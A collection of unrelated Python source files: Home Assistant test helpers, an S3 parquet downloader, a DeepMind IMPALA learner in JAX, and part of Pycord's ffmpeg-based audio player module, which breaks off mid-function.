self.calls.append(('turn_on', kwargs))
self._state = STATE_ON
def turn_off(self, **kwargs):
"""Turn the device off."""
self.calls.append(('turn_off', kwargs))
self._state = STATE_OFF
def last_call(self, method=None):
"""Return the last call."""
if not self.calls:
return None
if method is None:
return self.calls[-1]
try:
return next(call for call in reversed(self.calls)
if call[0] == method)
except StopIteration:
return None
class MockConfigEntry(config_entries.ConfigEntry):
"""Helper for creating config entries that adds some defaults."""
def __init__(self, *, domain='test', data=None, version=0, entry_id=None,
source=config_entries.SOURCE_USER, title='Mock Title',
state=None,
connection_class=config_entries.CONN_CLASS_UNKNOWN):
"""Initialize a mock config entry."""
kwargs = {
'entry_id': entry_id or 'mock-id',
'domain': domain,
'data': data or {},
'version': version,
'title': title,
'connection_class': connection_class,
}
if source is not None:
kwargs['source'] = source
if state is not None:
kwargs['state'] = state
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
hass.config_entries._entries.append(self)
def add_to_manager(self, manager):
"""Test helper to add entry to entry manager."""
manager._entries.append(self)
def patch_yaml_files(files_dict, endswith=True):
"""Patch load_yaml with a dictionary of yaml files."""
# match using endswith, start search with longest string
matchlist = sorted(list(files_dict.keys()), key=len) if endswith else []
def mock_open_f(fname, **_):
"""Mock open() in the yaml module, used by load_yaml."""
# Return the mocked file on full match
if fname in files_dict:
_LOGGER.debug("patch_yaml_files match %s", fname)
res = StringIO(files_dict[fname])
setattr(res, 'name', fname)
return res
# Match using endswith
for ends in matchlist:
if fname.endswith(ends):
_LOGGER.debug("patch_yaml_files end match %s: %s", ends, fname)
res = StringIO(files_dict[ends])
setattr(res, 'name', fname)
return res
# Fallback for hass.components (i.e. services.yaml)
if 'homeassistant/components' in fname:
_LOGGER.debug("patch_yaml_files using real file: %s", fname)
return open(fname, encoding='utf-8')
# Not found
raise FileNotFoundError("File not found: {}".format(fname))
return patch.object(yaml, 'open', mock_open_f, create=True)
def mock_coro(return_value=None, exception=None):
"""Return a coro that returns a value or raise an exception."""
return mock_coro_func(return_value, exception)()
def mock_coro_func(return_value=None, exception=None):
"""Return a method to create a coro function that returns a value."""
@asyncio.coroutine
def coro(*args, **kwargs):
"""Fake coroutine."""
if exception:
raise exception
return return_value
return coro
@contextmanager
def assert_setup_component(count, domain=None):
"""Collect valid configuration from setup_component.
- count: The amount of valid platforms that should be setup
- domain: The domain to count is optional. It can be automatically
determined most of the time
Use as a context manager around setup.setup_component
with assert_setup_component(0) as result_config:
setup_component(hass, domain, start_config)
# using result_config is optional
"""
config = {}
@ha.callback
def mock_psc(hass, config_input, domain):
"""Mock the prepare_setup_component to capture config."""
res = async_process_component_config(
hass, config_input, domain)
config[domain] = None if res is None else res.get(domain)
_LOGGER.debug("Configuration for %s, Validated: %s, Original %s",
domain, config[domain], config_input.get(domain))
return res
assert isinstance(config, dict)
with patch('homeassistant.config.async_process_component_config',
mock_psc):
yield config
if domain is None:
assert len(config) == 1, ('assert_setup_component requires DOMAIN: {}'
.format(list(config.keys())))
domain = list(config.keys())[0]
res = config.get(domain)
res_len = 0 if res is None else len(res)
assert res_len == count, 'setup_component failed, expected {} got {}: {}' \
.format(count, res_len, res)
def init_recorder_component(hass, add_config=None):
"""Initialize the recorder."""
config = dict(add_config) if add_config else {}
config[recorder.CONF_DB_URL] = 'sqlite://' # In memory DB
with patch('homeassistant.components.recorder.migration.migrate_schema'):
assert setup_component(hass, recorder.DOMAIN,
{recorder.DOMAIN: config})
assert recorder.DOMAIN in hass.config.components
_LOGGER.info("In-memory recorder successfully started")
def mock_restore_cache(hass, states):
"""Mock the DATA_RESTORE_CACHE."""
key = restore_state.DATA_RESTORE_CACHE
hass.data[key] = {
state.entity_id: state for state in states}
_LOGGER.debug('Restore cache: %s', hass.data[key])
assert len(hass.data[key]) == len(states), \
"Duplicate entity_id? {}".format(states)
hass.state = ha.CoreState.starting
mock_component(hass, recorder.DOMAIN)
class MockDependency:
"""Decorator to mock install a dependency."""
def __init__(self, root, *args):
"""Initialize decorator."""
self.root = root
self.submodules = args
def __enter__(self):
"""Start mocking."""
def resolve(mock, path):
"""Resolve a mock."""
if not path:
return mock
return resolve(getattr(mock, path[0]), path[1:])
base = MagicMock()
to_mock = {
"{}.{}".format(self.root, tom): resolve(base, tom.split('.'))
for tom in self.submodules
}
to_mock[self.root] = base
self.patcher = patch.dict('sys.modules', to_mock)
self.patcher.start()
return base
def __exit__(self, *exc):
"""Stop mocking."""
self.patcher.stop()
return False
def __call__(self, func):
"""Apply decorator."""
def run_mocked(*args, **kwargs):
"""Run with mocked dependencies."""
with self as base:
args = list(args) + [base]
func(*args, **kwargs)
return run_mocked
class MockEntity(entity.Entity):
"""Mock Entity class."""
def __init__(self, **values):
"""Initialize an entity."""
self._values = values
if 'entity_id' in values:
self.entity_id = values['entity_id']
@property
def name(self):
"""Return the name of the entity."""
return self._handle('name')
@property
def should_poll(self):
"""Return the ste of the polling."""
return self._handle('should_poll')
@property
def unique_id(self):
"""Return the unique ID of the entity."""
return self._handle('unique_id')
@property
def available(self):
"""Return True if entity is available."""
return self._handle('available')
@property
def device_info(self):
"""Info how it links to a device."""
return self._handle('device_info')
def _handle(self, attr):
"""Return attribute value."""
if attr in self._values:
return self._values[attr]
return getattr(super(), attr)
@contextmanager
def mock_storage(data=None):
"""Mock storage.
Data is a dict {'key': {'version': version, 'data': data}}
Written data will be converted to JSON to ensure JSON parsing works.
"""
if data is None:
data = {}
orig_load = storage.Store._async_load
async def mock_async_load(store):
"""Mock version of load."""
if store._data is None:
# No data to load
if store.key not in data:
return None
mock_data = data.get(store.key)
if 'data' not in mock_data or 'version' not in mock_data:
_LOGGER.error('Mock data needs "version" and "data"')
raise ValueError('Mock data needs "version" and "data"')
store._data = mock_data
# Route through original load so that we trigger migration
loaded = await orig_load(store)
_LOGGER.info('Loading data for %s: %s', store.key, loaded)
return loaded
def mock_write_data(store, path, data_to_write):
"""Mock version of write data."""
# To ensure that the data can be serialized
_LOGGER.info('Writing data to %s: %s', store.key, data_to_write)
data[store.key] = json.loads(json.dumps(data_to_write))
with patch('homeassistant.helpers.storage.Store._async_load',
side_effect=mock_async_load, autospec=True), \
patch('homeassistant.helpers.storage.Store._write_data',
side_effect=mock_write_data, autospec=True):
yield data
async def flush_store(store):
"""Make sure all delayed writes of a store are written."""
if store._data is None:
return
await store._async_handle_write_data()
|
download.py
|
#!/usr/local/bin/python3
# encoding: utf-8
"""
download.py
Created by Zach Schumacher on 2019-08-14.
Modified by Patrick Shaner on 2019-08-14.
Copyright (c) 2019 Patrick Shaner
Downloads data files from S3 file to local storage
Version 2019-08-14
Initial file creation
Version 2019-08-14
Updated to write to a temp directory
"""
import os
import s3fs
from multiprocessing import Process, Queue, cpu_count
from urllib3.connection import NewConnectionError
class DownloadError(Exception):
pass
class ParquetFromS3:
"""
Downloads all the elements in a parquet directory using multiprocessing.
:param connection: s3fS connection to S3 storage
:param parent_dir: directory created to store all elements
:param uri: S3 path to download
:: How to run::
Initialize class with a connection created leveraging S3FS, pass in the directory you want to save the
parquet directory to and the parquet file to download from S3
Call property download_parquet_files, this will return a boolean of True if all files now exist on the
local storage (successfully downloaded) or false if not
"""
_connection = None # Connection to S3 leveraging S3FS
_destination_path = None # Directory to write files to as downloads
_uri = None # S3 Bucket to download from
_queue = None # Threading Queue
_num_of_processes = None # Number of process for Queue
_files_to_download = None # List of all files to download from S3
def __init__(self, connection: s3fs, parent_dir: str, uri: str) -> None:
"""
Downloads all the elements in a parquet directory using multiprocessing.
:param connection: s3fS connection to S3 storage
:param parent_dir: directory created to store all elements
:param uri: S3 path to download
"""
self._files_to_download = list()
self._num_of_processes = cpu_count()
self._queue = Queue()
self._uri = uri
self._set_connection_to_s3(connection)
self._set_destination_directory(parent_dir)
self._create_list_of_files_to_download()
@property
def destination_path(self):
return self._destination_path
@property
def successfully_downloaded(self) -> bool:
"""
Validates that all files expected to be downloaded actually download
:return: bool
"""
found_all_results = True
for file_name in self._files_to_download:
final_path = os.path.join(self.destination_path, file_name)
if not os.path.exists(final_path):
found_all_results = False
break
if os.path.getsize(final_path) <= 1:
found_all_results = False
break
return found_all_results
def download_files_from_s3(self) -> None:
"""
Validates that all files located in S3 successfully downloaded to local disk
:return: None
"""
processes = []
for i in range(self._num_of_processes):
p = Process(target=self._download_single_file, args=(self._queue,))
processes.append(p)
p.start()
for process in processes:
process.join()
def _create_list_of_files_to_download(self) -> None:
"""
Iterates over the S3 path creating a list of all files that do not start with '_'
:return: None
"""
for file_name in self._connection.ls(f's3://{self._uri}'):
if not os.path.basename(file_name).startswith('_'):
self._queue.put(file_name)
_, name_part = os.path.split(file_name)
self._files_to_download.append(name_part)
def _set_connection_to_s3(self, connection: s3fs) -> None:
"""
Validates connection is correct type and not None, if None creates a new connection leveraging ENV Variables
:param connection: Connection object created from env variables by caller
:return: None
"""
if connection:
self._connection = connection
else:
key = os.getenv("S3_ACCESS", None)
secret = os.getenv("S3_SECRET", None)
if key and secret:
self._connection = s3fs.S3FileSystem(key=key, secret=secret)
else:
raise DownloadError("Unable to make connection to S3 because required "
"environment variables are not set")
def _set_destination_directory(self, parent_dir: str) -> None:
"""
Creates a destination directory within the parent directory
:param parent_dir: string file path
:return: None
"""
if not parent_dir:
raise DownloadError("Destination directory is not set")
else:
_, file_name = os.path.split(self._uri)
self._destination_path = os.path.join(parent_dir, f"{file_name}")
if not os.path.exists(self._destination_path):
os.mkdir(self._destination_path)
def _download_single_file(self, queue):
try:
while not queue.empty():
path = queue.get()
filename = os.path.basename(path)
_target_path = os.path.join(self._destination_path, filename)
with self._connection.open(path, 'rb') as remote_file, open(_target_path, 'wb') as local_file:
local_file.write(remote_file.read())
except NewConnectionError as con:
raise DownloadError(f"Failed to complete downloading because {con}")
|
learner.py
|
# Copyright 2020 DeepMind Technologies Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""IMPALA learner class."""
import functools
import itertools
import queue
import threading
from typing import Dict, Tuple
import warnings
import dm_env
import haiku as hk
from examples.impala import agent as agent_lib
from examples.impala import util
import jax
from jax.experimental import optimizers
import jax.numpy as jnp
import numpy as np
import optax
import rlax
# The IMPALA paper sums losses, rather than taking the mean.
# We wrap rlax to do so as well.
def policy_gradient_loss(logits, *args):
"""rlax.policy_gradient_loss, but with sum(loss) and [T, B, ...] inputs."""
mean_per_batch = jax.vmap(rlax.policy_gradient_loss, in_axes=1)(logits, *args)
total_loss_per_batch = mean_per_batch * logits.shape[0]
return jnp.sum(total_loss_per_batch)
def entropy_loss(logits, *args):
"""rlax.entropy_loss, but with sum(loss) and [T, B, ...] inputs."""
mean_per_batch = jax.vmap(rlax.entropy_loss, in_axes=1)(logits, *args)
total_loss_per_batch = mean_per_batch * logits.shape[0]
return jnp.sum(total_loss_per_batch)
class Learner:
"""Manages state and performs updates for IMPALA learner."""
def __init__(
self,
agent: agent_lib.Agent,
rng_key,
opt: optax.GradientTransformation,
batch_size: int,
discount_factor: float,
frames_per_iter: int,
max_abs_reward: float = 0,
logger=None,
):
if jax.device_count() > 1:
warnings.warn('Note: the impala example will only take advantage of a '
'single accelerator.')
self._agent = agent
self._opt = opt
self._batch_size = batch_size
self._discount_factor = discount_factor
self._frames_per_iter = frames_per_iter
self._max_abs_reward = max_abs_reward
# Data pipeline objects.
self._done = False
self._host_q = queue.Queue(maxsize=self._batch_size)
self._device_q = queue.Queue(maxsize=1)
# Prepare the parameters to be served to actors.
params = agent.initial_params(rng_key)
self._params_for_actor = (0, jax.device_get(params))
# Set up logging.
if logger is None:
logger = util.NullLogger()
self._logger = logger
def _loss(
self,
theta: hk.Params,
trajectories: util.Transition,
) -> Tuple[jnp.ndarray, Dict[str, jnp.ndarray]]:
"""Compute vtrace-based actor-critic loss."""
initial_state = jax.tree_map(lambda t: t[0], trajectories.agent_state)
learner_outputs = self._agent.unroll(theta, trajectories.timestep,
initial_state)
v_t = learner_outputs.values[1:]
# Remove bootstrap timestep from non-timesteps.
_, actor_out, _ = jax.tree_map(lambda t: t[:-1], trajectories)
learner_outputs = jax.tree_map(lambda t: t[:-1], learner_outputs)
v_tm1 = learner_outputs.values
# Get the discount, reward, step_type from the *next* timestep.
timestep = jax.tree_map(lambda t: t[1:], trajectories.timestep)
discounts = timestep.discount * self._discount_factor
rewards = timestep.reward
if self._max_abs_reward > 0:
rewards = jnp.clip(rewards, -self._max_abs_reward, self._max_abs_reward)
# The step is uninteresting if we transitioned LAST -> FIRST.
# timestep corresponds to the *next* time step, so we filter for FIRST.
mask = jnp.not_equal(timestep.step_type, int(dm_env.StepType.FIRST))
mask = mask.astype(jnp.float32)
rhos = rlax.categorical_importance_sampling_ratios(
learner_outputs.policy_logits, actor_out.policy_logits,
actor_out.action)
# vmap vtrace_td_error_and_advantage to take/return [T, B, ...].
vtrace_td_error_and_advantage = jax.vmap(
rlax.vtrace_td_error_and_advantage, in_axes=1, out_axes=1)
vtrace_returns = vtrace_td_error_and_advantage(
v_tm1, v_t, rewards, discounts, rhos)
pg_advs = vtrace_returns.pg_advantage
pg_loss = policy_gradient_loss(learner_outputs.policy_logits,
actor_out.action, pg_advs, mask)
baseline_loss = 0.5 * jnp.sum(jnp.square(vtrace_returns.errors) * mask)
ent_loss = entropy_loss(learner_outputs.policy_logits, mask)
total_loss = pg_loss
total_loss += 0.5 * baseline_loss
total_loss += 0.01 * ent_loss
logs = {}
logs['PG_loss'] = pg_loss
logs['baseline_loss'] = baseline_loss
logs['entropy_loss'] = ent_loss
logs['total_loss'] = total_loss
return total_loss, logs
@functools.partial(jax.jit, static_argnums=0)
def update(self, params, opt_state, batch: util.Transition):
"""The actual update function."""
(_, logs), grads = jax.value_and_grad(
self._loss, has_aux=True)(params, batch)
grad_norm_unclipped = optimizers.l2_norm(grads)
updates, updated_opt_state = self._opt.update(grads, opt_state)
params = optax.apply_updates(params, updates)
weight_norm = optimizers.l2_norm(params)
logs.update({
'grad_norm_unclipped': grad_norm_unclipped,
'weight_norm': weight_norm,
})
return params, updated_opt_state, logs
def enqueue_traj(self, traj: util.Transition):
"""Enqueue trajectory."""
self._host_q.put(traj)
def params_for_actor(self) -> Tuple[int, hk.Params]:
return self._params_for_actor
def host_to_device_worker(self):
"""Elementary data pipeline."""
batch = []
while not self._done:
# Try to get a batch. Skip the iteration if we couldn't.
try:
for _ in range(len(batch), self._batch_size):
# As long as possible while keeping learner_test time reasonable.
batch.append(self._host_q.get(timeout=10))
except queue.Empty:
continue
assert len(batch) == self._batch_size
# Prepare for consumption, then put batch onto device.
stacked_batch = jax.tree_multimap(lambda *xs: np.stack(xs, axis=1),
*batch)
self._device_q.put(jax.device_put(stacked_batch))
# Clean out the built-up batch.
batch = []
def run(self, max_iterations: int = -1):
"""Runs the learner for max_iterations updates."""
# Start host-to-device transfer worker.
transfer_thread = threading.Thread(target=self.host_to_device_worker)
transfer_thread.start()
(num_frames, params) = self._params_for_actor
opt_state = self._opt.init(params)
steps = range(max_iterations) if max_iterations != -1 else itertools.count()
for _ in steps:
batch = self._device_q.get()
params, opt_state, logs = self.update(params, opt_state, batch)
num_frames += self._frames_per_iter
# Collect parameters to distribute to downstream actors.
self._params_for_actor = (num_frames, jax.device_get(params))
# Collect and write logs out.
logs = jax.device_get(logs)
logs.update({
'num_frames': num_frames,
})
self._logger.write(logs)
# Shut down.
self._done = True
self._logger.close()
transfer_thread.join()
|
player.py
|
"""
The MIT License (MIT)
Copyright (c) 2015-2021 Rapptz
Copyright (c) 2021-present Pycord Development
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
from __future__ import annotations
import asyncio
import audioop
import io
import json
import logging
import re
import shlex
import subprocess
import sys
import threading
import time
import traceback
from typing import (
IO,
TYPE_CHECKING,
Any,
Callable,
Generic,
Optional,
Tuple,
Type,
TypeVar,
Union,
)
from .errors import ClientException
from .oggparse import OggStream
from .opus import Encoder as OpusEncoder
from .utils import MISSING
if TYPE_CHECKING:
from .voice_client import VoiceClient
AT = TypeVar("AT", bound="AudioSource")
FT = TypeVar("FT", bound="FFmpegOpusAudio")
_log = logging.getLogger(__name__)
__all__ = (
"AudioSource",
"PCMAudio",
"FFmpegAudio",
"FFmpegPCMAudio",
"FFmpegOpusAudio",
"PCMVolumeTransformer",
)
CREATE_NO_WINDOW: int
if sys.platform != "win32":
CREATE_NO_WINDOW = 0
else:
CREATE_NO_WINDOW = 0x08000000
class AudioSource:
"""Represents an audio stream.
The audio stream can be Opus encoded or not, however if the audio stream
is not Opus encoded then the audio format must be 16-bit 48KHz stereo PCM.
.. warning::
The audio source reads are done in a separate thread.
"""
def read(self) -> bytes:
"""Reads 20ms worth of audio.
Subclasses must implement this.
If the audio is complete, then returning an empty
:term:`py:bytes-like object` to signal this is the way to do so.
If :meth:`~AudioSource.is_opus` method returns ``True``, then it must return
20ms worth of Opus encoded audio. Otherwise, it must be 20ms
worth of 16-bit 48KHz stereo PCM, which is about 3,840 bytes
per frame (20ms worth of audio).
Returns
--------
:class:`bytes`
A bytes like object that represents the PCM or Opus data.
"""
raise NotImplementedError
def is_opus(self) -> bool:
"""Checks if the audio source is already encoded in Opus."""
return False
def cleanup(self) -> None:
"""Called when clean-up is needed to be done.
Useful for clearing buffer data or processes after
it is done playing audio.
"""
pass
def __del__(self) -> None:
self.cleanup()
class PCMAudio(AudioSource):
"""Represents raw 16-bit 48KHz stereo PCM audio source.
Attributes
-----------
stream: :term:`py:file object`
A file-like object that reads byte data representing raw PCM.
"""
def __init__(self, stream: io.BufferedIOBase) -> None:
self.stream: io.BufferedIOBase = stream
def read(self) -> bytes:
ret = self.stream.read(OpusEncoder.FRAME_SIZE)
if len(ret) != OpusEncoder.FRAME_SIZE:
return b""
return ret
class FFmpegAudio(AudioSource):
"""Represents an FFmpeg (or AVConv) based AudioSource.
User created AudioSources using FFmpeg differently from how :class:`FFmpegPCMAudio` and
:class:`FFmpegOpusAudio` work should subclass this.
.. versionadded:: 1.3
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
executable: str = "ffmpeg",
args: Any,
**subprocess_kwargs: Any,
):
piping = subprocess_kwargs.get("stdin") == subprocess.PIPE
if piping and isinstance(source, str):
raise TypeError("parameter conflict: 'source' parameter cannot be a string when piping to stdin")
args = [executable, *args]
kwargs = {"stdout": subprocess.PIPE}
kwargs.update(subprocess_kwargs)
self._process: subprocess.Popen = self._spawn_process(args, **kwargs)
self._stdout: IO[bytes] = self._process.stdout # type: ignore
self._stdin: Optional[IO[bytes]] = None
self._pipe_thread: Optional[threading.Thread] = None
if piping:
n = f"popen-stdin-writer:{id(self):#x}"
self._stdin = self._process.stdin
self._pipe_thread = threading.Thread(target=self._pipe_writer, args=(source,), daemon=True, name=n)
self._pipe_thread.start()
def _spawn_process(self, args: Any, **subprocess_kwargs: Any) -> subprocess.Popen:
process = None
try:
process = subprocess.Popen(args, creationflags=CREATE_NO_WINDOW, **subprocess_kwargs)
except FileNotFoundError:
executable = args.partition(" ")[0] if isinstance(args, str) else args[0]
raise ClientException(f"{executable} was not found.") from None
except subprocess.SubprocessError as exc:
raise ClientException(f"Popen failed: {exc.__class__.__name__}: {exc}") from exc
else:
return process
def _kill_process(self) -> None:
proc = self._process
if proc is MISSING:
return
_log.info("Preparing to terminate ffmpeg process %s.", proc.pid)
try:
proc.kill()
except Exception:
_log.exception("Ignoring error attempting to kill ffmpeg process %s", proc.pid)
if proc.poll() is None:
_log.info(
"ffmpeg process %s has not terminated. Waiting to terminate...",
proc.pid,
)
proc.communicate()
_log.info(
"ffmpeg process %s should have terminated with a return code of %s.",
proc.pid,
proc.returncode,
)
else:
_log.info(
"ffmpeg process %s successfully terminated with return code of %s.",
proc.pid,
proc.returncode,
)
def _pipe_writer(self, source: io.BufferedIOBase) -> None:
while self._process:
# arbitrarily large read size
data = source.read(8192)
if not data:
self._process.terminate()
return
try:
self._stdin.write(data)
except Exception:
_log.debug(
"Write error for %s, this is probably not a problem",
self,
exc_info=True,
)
# at this point the source data is either exhausted or the process is fubar
self._process.terminate()
return
def cleanup(self) -> None:
self._kill_process()
self._process = self._stdout = self._stdin = MISSING
class FFmpegPCMAudio(FFmpegAudio):
"""An audio source from FFmpeg (or AVConv).
This launches a sub-process to a specific input file given.
.. warning::
You must have the ffmpeg or avconv executable in your path environment
variable in order for this to work.
Parameters
------------
source: Union[:class:`str`, :class:`io.BufferedIOBase`]
The input that ffmpeg will take and convert to PCM bytes.
If ``pipe`` is ``True`` then this is a file-like object that is
passed to the stdin of ffmpeg.
executable: :class:`str`
The executable name (and path) to use. Defaults to ``ffmpeg``.
pipe: :class:`bool`
If ``True``, denotes that ``source`` parameter will be passed
to the stdin of ffmpeg. Defaults to ``False``.
stderr: Optional[:term:`py:file object`]
A file-like object to pass to the Popen constructor.
Could also be an instance of ``subprocess.PIPE``.
before_options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg after the ``-i`` flag.
Raises
--------
ClientException
The subprocess failed to be created.
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
executable: str = "ffmpeg",
pipe: bool = False,
stderr: Optional[IO[str]] = None,
before_options: Optional[str] = None,
options: Optional[str] = None,
) -> None:
args = []
subprocess_kwargs = {
"stdin": subprocess.PIPE if pipe else subprocess.DEVNULL,
"stderr": stderr,
}
if isinstance(before_options, str):
args.extend(shlex.split(before_options))
args.append("-i")
args.append("-" if pipe else source)
args.extend(("-f", "s16le", "-ar", "48000", "-ac", "2", "-loglevel", "warning"))
if isinstance(options, str):
args.extend(shlex.split(options))
args.append("pipe:1")
super().__init__(source, executable=executable, args=args, **subprocess_kwargs)
def read(self) -> bytes:
ret = self._stdout.read(OpusEncoder.FRAME_SIZE)
if len(ret) != OpusEncoder.FRAME_SIZE:
return b""
return ret
def is_opus(self) -> bool:
return False
class FFmpegOpusAudio(FFmpegAudio):
"""An audio source from FFmpeg (or AVConv).
This launches a sub-process to a specific input file given. However, rather than
producing PCM packets like :class:`FFmpegPCMAudio` does that need to be encoded to
Opus, this class produces Opus packets, skipping the encoding step done by the library.
Alternatively, instead of instantiating this class directly, you can use
:meth:`FFmpegOpusAudio.from_probe` to probe for bitrate and codec information. This
can be used to opportunistically skip pointless re-encoding of existing Opus audio data
for a boost in performance at the cost of a short initial delay to gather the information.
The same can be achieved by passing ``copy`` to the ``codec`` parameter, but only if you
know that the input source is Opus encoded beforehand.
.. versionadded:: 1.3
.. warning::
You must have the ffmpeg or avconv executable in your path environment
variable in order for this to work.
Parameters
------------
source: Union[:class:`str`, :class:`io.BufferedIOBase`]
The input that ffmpeg will take and convert to Opus bytes.
If ``pipe`` is ``True`` then this is a file-like object that is
passed to the stdin of ffmpeg.
bitrate: :class:`int`
The bitrate in kbps to encode the output to. Defaults to ``128``.
codec: Optional[:class:`str`]
The codec to use to encode the audio data. Normally this would be
just ``libopus``, but is used by :meth:`FFmpegOpusAudio.from_probe` to
opportunistically skip pointlessly re-encoding Opus audio data by passing
``copy`` as the codec value. Any values other than ``copy``, ``opus``, or
``libopus`` will be considered ``libopus``. Defaults to ``libopus``.
.. warning::
Do not provide this parameter unless you are certain that the audio input is
already Opus encoded. For typical use :meth:`FFmpegOpusAudio.from_probe`
should be used to determine the proper value for this parameter.
executable: :class:`str`
The executable name (and path) to use. Defaults to ``ffmpeg``.
pipe: :class:`bool`
If ``True``, denotes that ``source`` parameter will be passed
to the stdin of ffmpeg. Defaults to ``False``.
stderr: Optional[:term:`py:file object`]
A file-like object to pass to the Popen constructor.
Could also be an instance of ``subprocess.PIPE``.
before_options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg after the ``-i`` flag.
Raises
--------
ClientException
The subprocess failed to be created.
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
bitrate: int = 128,
codec: Optional[str] = None,
executable: str = "ffmpeg",
pipe=False,
stderr=None,
before_options=None,
options=None,
) -> None:
args = []
subprocess_kwargs = {
"stdin": subprocess.PIPE if pipe else subprocess.DEVNULL,
"stderr": stderr,
}
if isinstance(before_options, str):
args.extend(shlex.split(before_options))
args.append("-i")
args.append("-" if pipe else source)
codec = "copy" if codec in ("opus", "libopus") else "libopus"
args.extend(
(
"-map_metadata",
"-1",
"-f",
"opus",
"-c:a",
codec,
"-ar",
"48000",
"-ac",
"2",
"-b:a",
f"{bitrate}k",
"-loglevel",
"warning",
)
)
if isinstance(options, str):
args.extend(shlex.split(options))
args.append("pipe:1")
super().__init__(source, executable=executable, args=args, **subprocess_kwargs)
self._packet_iter = OggStream(self._stdout).iter_packets()
@classmethod
async def from_probe(
cls: Type[FT],
source: str,
*,
method: Optional[Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]] = None,
**kwargs: Any,
) -> FT:
"""|coro|
A factory method that creates a :class:`FFmpegOpusAudio` after probing
the input source for audio codec and bitrate information.
Examples
----------
Use this function to create an :class:`FFmpegOpusAudio` instance instead of the constructor: ::
source = await discord.FFmpegOpusAudio.from_probe("song.webm")
voice_client.play(source)
If you are on Windows and don't have ffprobe installed, use the ``fallback`` method
to probe using ffmpeg instead: ::
source = await discord.FFmpegOpusAudio.from_probe("song.webm", method='fallback')
voice_client.play(source)
Using a custom method of determining codec and bitrate: ::
def custom_probe(source, executable):
# some analysis code here
return codec, bitrate
source = await discord.FFmpegOpusAudio.from_probe("song.webm", method=custom_probe)
voice_client.play(source)
Parameters
------------
source
Identical to the ``source`` parameter for the constructor.
method: Optional[Union[:class:`str`, Callable[:class:`str`, :class:`str`]]]
The probing method used to determine bitrate and codec information. As a string, valid
values are ``native`` to use ffprobe (or avprobe) and ``fallback`` to use ffmpeg
(or avconv). As a callable, it must take two string arguments, ``source`` and
``executable``. Both parameters are the same values passed to this factory function.
``executable`` will default to ``ffmpeg`` if not provided as a keyword argument.
kwargs
The remaining parameters to be passed to the :class:`FFmpegOpusAudio` constructor,
excluding ``bitrate`` and ``codec``.
Raises
--------
AttributeError
Invalid probe method, must be ``'native'`` or ``'fallback'``.
TypeError
Invalid value for ``probe`` parameter, must be :class:`str` or a callable.
Returns
--------
:class:`FFmpegOpusAudio`
An instance of this class.
"""
executable = kwargs.get("executable")
codec, bitrate = await cls.probe(source, method=method, executable=executable)
return cls(source, bitrate=bitrate, codec=codec, **kwargs) # type: ignore
@classmethod
async def probe(
cls,
source: str,
*,
method: Optional[Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]] = None,
executable: Optional[str] = None,
) -> Tuple[Optional[str], Optional[int]]:
"""|coro|
Probes the input source for bitrate and codec information.
Parameters
------------
source
Identical to the ``source`` parameter for :class:`FFmpegOpusAudio`.
method
Identical to the ``method`` parameter for :meth:`FFmpegOpusAudio.from_probe`.
executable: :class:`str`
Identical to the ``executable`` parameter for :class:`FFmpegOpusAudio`.
Raises
--------
AttributeError
Invalid probe method, must be ``'native'`` or ``'fallback'``.
TypeError
Invalid value for ``probe`` parameter, must be :class:`str` or a callable.
Returns
---------
Optional[Tuple[Optional[:class:`str`], Optional[:class:`int`]]]
A 2-tuple with the codec and bitrate of the input source.
"""
method = method or "native"
executable = executable or "ffmpeg"
probefunc = fallback = None
if isinstance(method, str):
probefunc = getattr(cls, f"_probe_codec_{method}", None)
if probefunc is None:
raise AttributeError(f"Invalid probe method {method!r}")
if probefunc is cls._probe_codec_native:
fallback = cls._probe_codec_fallback
elif callable(method):
probefunc = method
fallback = cls._probe_codec_fallback
else:
raise TypeError("Expected str or callable for parameter 'probe', " f"not '{method.__class__.__name__}'")
codec = bitrate = None
loop = asyncio.get_event_loop()
try:
codec, bitrate = await loop.run_in_executor(None, lambda: probefunc(source, executable)) # type: ignore
except Exception:
if not fallback:
_log.exception("Probe '%s' using '%s' failed", method, executable)
return # type: ignore
_log.exception("Probe '%s' using '%s' failed, trying fallback", method, executable)
try:
codec, bitrate = await loop.run_in_executor(None, lambda: fallback(source, executable)) # type: ignore
except Exception:
_log.exception("Fallback probe using '%s' failed", executable)
else:
_log.info("Fallback probe found codec=%s, bitrate=%s", codec, bitrate)
else:
_log.info("Probe found codec=%s, bitrate=%s", codec, bitrate)
finally:
return codec, bitrate
@staticmethod
def _probe_codec_native(source, executable: str = "ffmpeg") -> Tuple[Optional[str], Optional[int]]:
exe = f"{executable[:2]}probe" if executable in {"ffmpeg", "avconv"} else executable
args = [
exe,
"-v",
